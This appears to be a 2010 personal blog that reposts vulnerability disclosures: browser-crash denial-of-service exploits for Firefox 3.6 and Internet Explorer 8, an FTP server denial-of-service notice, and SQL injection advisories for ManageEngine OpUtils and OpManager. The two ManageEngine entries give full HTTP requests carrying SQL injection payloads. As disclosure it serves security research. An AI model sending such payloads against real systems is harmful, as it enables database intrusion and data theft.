Wednesday, March 3, 2010

Mozilla Firefox 3.6 plenitude String Crash(0day) Exploit

link:http://www.exploit-db.com/exploits/11617
link:http://www.packetstormsecurity.org/1003-exploits/mozff36-crash.txt

for code

=======================================================================

Mozilla Firefox 3.6 plenitude String Crash(0day) Exploit
=======================================================================

by

Asheesh Kumar Mani Tripathi


# code by Asheesh kumar Mani Tripathi

# email informationhacker08@gmail.com

# company www.aksitservices.co.in

# Credit by Asheesh Anaconda


#Download www.mozilla.com/firefox


#Background

Mozilla Firefox is a popular internet browser. .....:)

#Vulnerability
This bug is a typical result when attacker try to write plenitude String in
document.write() function .User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.


#Impact
MOzilla Crash :)


#Proof of concept
copy the code in text file and save as "asheesh.html" and closed all tabs and windows to avoid any lost of data

open in Mozilla Firefox and wait for 15 sec ...... :) and say Good Bye

Mozilla .......

Per usske phele Mozilla k antim darshan kar le :) Prem se bolo jai maata di

Mozilla Rest In Piece!!!!!!!!!!!!!!!!!!!!!!!!!!!



BHAGAVAD GITA Quote
You came empty handed, you will leave empty handed. What is yours today, belonged to someone else yesterday, and will belong to someone else the day after tomorrow. So, whatever you do, do it as a dedication to God!

Tum khaali haath aaye, khaali haath chale. Jo aaj tumhara hain, wao kal kisi aur ka tha, parso kisi aur ka hoga. Tum isse apna samajhkar magna ho rahe ho,bus yahi prasannatha tumhare dukhon ka kaaran hain.

#If you have any questions, comments, or concerns, feel free to contact me.

Thursday, February 18, 2010

Internet Explorer 8 (Multitudinous looping )Denial of Service Exploit

Internet Explorer 8 (Multitudinous looping )Denial of Service Exploit
http://www.exploit-db.com/exploits/11438
http://seclists.org/fulldisclosure/2010/Feb/281


for code visit above link as no script allow in blogger



=======================================================================

Internet Explorer 8 (Multitudinous looping )Denial of Service Exploit
=======================================================================

by

Asheesh Kumar Mani Tripathi


# code by Asheesh kumar Mani Tripathi

# email informationhacker08@gmail.com

# company aksitservices

# Credit by Asheesh Anaconda


#Download http://www.microsoft.com/windows/internet-explorer/worldwide-sites.aspx
#Greets to Bhudeo Prasad for making shell script :)


#Background

Internet Explorer 8 is a popular internet browser. with lots of bugs .....:)

#Vulnerability
This bug is a typical result of multitudinous loop.
The flaw exists within "history go" ActiveX control which contains
stack based overflow conditions.User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.


#Impact

Attacker Can run any windows command ,consume lots of memory and able to crash your IE or make
your system unaccessible,your work if any might be lost

#Proof of concept
copy the code in text file and save as "asheesh.html" open in Internet Explorer 8

========================================================================================================================

asheesh.html
========================================================================================================================

asheesh kumar mani tripathi









========================================================================================================================




#If you have any questions, comments, or concerns, feel free to contact me.






Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit

Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit

http://www.exploit-db.com/exploits/11432
http://seclists.org/fulldisclosure/2010/Feb/280

=======================================================================

Mozilla Firefox 3.6 (Multitudinous looping )Denial of Service Exploit
=======================================================================

by

Asheesh Kumar Mani Tripathi


# code by Asheesh kumar Mani Tripathi

# email informationhacker08@gmail.com

# company aksitservices

# Credit by Asheesh Anaconda


#Download www.mozilla.com/firefox


#Background

Mozilla Firefox is a popular internet browser. .....:)

#Vulnerability
This bug is a typical result of multitudinous loop.
The flaw exists when the attacker put window.printer() funtion
in multitudinous loop.User interaction is required to
exploit this vulnerability in that the target must visit a malicious
web page.


#Impact
Browser doesn't respond any longer to any user input, all tabs are no
longer accessible, your work if any might be lost.



#Proof of concept
copy the code in text file and save as "asheesh.html" open in Mozilla Firefox

========================================================================================================================

asheesh.html
========================================================================================================================


asheesh kumar mani tripathi





========================================================================================================================


#If you have any questions, comments, or concerns, feel free to contact me.

ManageEngine OpUtils 'Login.do' SQL Injection Vulnerability

ManageEngine OpUtils 'Login.do' SQL Injection Vulnerability

http://www.securityfocus.com/bid/38082/info
www.packetstormsecurity.org/1002-exploits/oputils_5-sql.txt

================================================================================

ManageEngine OpUtils 5 "Login.DO" SQL Injection Vulnerability
================================================================================

#Date-3/2/10
# code by Asheesh kumar Mani Tripathi

# AKS IT Services

# Credit by Asheesh Anaconda


#Download http://www.manageengine.com/products/oputils

#Vulnerbility
ManageEngine OpUtils 5 is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

#Impact
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database


========================================================================================================================

Request
========================================================================================================================

POST /Login.do HTTP/1.1
Host: localhost:7080
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://localhost:7080/Login.do
Cookie: JSESSIONID=738A4E8130CBE2A0D5E857D9EBF9820E; 32=temp; 83=temp
Content-Type: application/x-www-form-urlencoded
Content-Length: 136

cookieexists=true&username=asheesh&password=asheesh&logonsubmit=+&log=WARNING&locationUrl=localhost&isHttpPort=false"+and+31337-31337="0



========================================================================================================================
Response
========================================================================================================================


HTTP/1.1 200 OK
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 03 Feb 2010 15:24:08 GMT
Server: Apache-Coyote/1.1
Content-Length: 20583

Sunday, January 24, 2010

FileCOPA FTP Server 'NOOP' Command Denial Of Service Vulnerability

FileCOPA FTP Server 'NOOP' Command Denial Of Service Vulnerability
FileCOPA FTP Server is prone to a denial-of-service vulnerability.

A successful exploit may allow attackers to halt the server process, resulting in a denial-of-service condition.
FileCOPA FTP Server 5.01 is vulnerable; other versions may also be affected.

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3662
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3662
http://www.securityfocus.com/bid/36397/info
http://www.securityfocus.com/bid/36397/discuss
http://isc.sans.org/newssummary.html
http://secunia.com/advisories/36773/
http://archives.neohapsis.com/archives/secunia/2009-q3/1120.html


find Details

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3662
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3662

FileCOPA FTP Server 'NOOP' Command Denial Of Service Vulnerability

FileCOPA FTP Server 'NOOP' Command Denial Of Service Vulnerability
FileCOPA FTP Server is prone to a denial-of-service vulnerability.

A successful exploit may allow attackers to halt the server process, resulting in a denial-of-service condition.
FileCOPA FTP Server 5.01 is vulnerable; other versions may also be affected.

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3662
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3662
http://www.securityfocus.com/bid/36397/info
http://www.securityfocus.com/bid/36397/discuss
http://isc.sans.org/newssummary.html
http://secunia.com/advisories/36773/
http://archives.neohapsis.com/archives/secunia/2009-q3/1120.html


find Details

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3662
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3662

Blind SQL/XPath injection in OPMANAGER

Blind SQL/XPath injection in OPMANAGER
packetstormsecurity.org/0912-exploits/opmanager-sql.txt
http://www.exploit-db.com/exploits/10372
ManageEngine OpManager 'overview.do' SQL Injection Vulnerability
http://www.securityfocus.com/bid/37289


Exploit Code

*******************************Blind SQL/XPath injection in OPMANAGER***********************************




# Exploit Title: Blind SQL/XPath injection in OPMANAGER
# Date: 8-Dec-09
# Author: Asheesh Kumar Mani Tripathi
# AKS IT Services
# Software Link: http://www.manageengine.com/products/opmanager/download.html
# Version: [app version]



Description

SQL injection is a vulnerability that allows an attacker to alter backend SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't properly filter out dangerous characters. This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable to SQL Injection.
XPath Injection is an attack technique used to exploit web sites that construct XPath queries from user-supplied input.

Impact
An unauthenticated attacker may execute arbitrary SQL/XPath statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information.

Vulnerable:

http://overview.do?selectedTab=Home&operation=showVoipDashboard_ajax&requestType=AJAX[Sql injectio ]&isFromInfra=yes HTTP/1.0


Get
overview.do?selectedTab=Home&operation=showVoipDashboard_ajax&requestType=AJAX'+and+313
37-31337=0+--+&isFromInfra=yes HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: localhost:8060
Cookie: JSESSIONID=54FA92CB3ADBA4C71B35C69251FFE9A1;flashversionInstalled=0.0.0
Connection: Close
Pragma: no-cache

Request:
HTTP/1.1 200 OK
Date: Tues, 08 Dec 2009 11:26:21 GMT
Server: Apache/2.0.47 (Win32) mod_jk/1.2.5
Connection: close
Content-Type: text/html;charset=UTF-8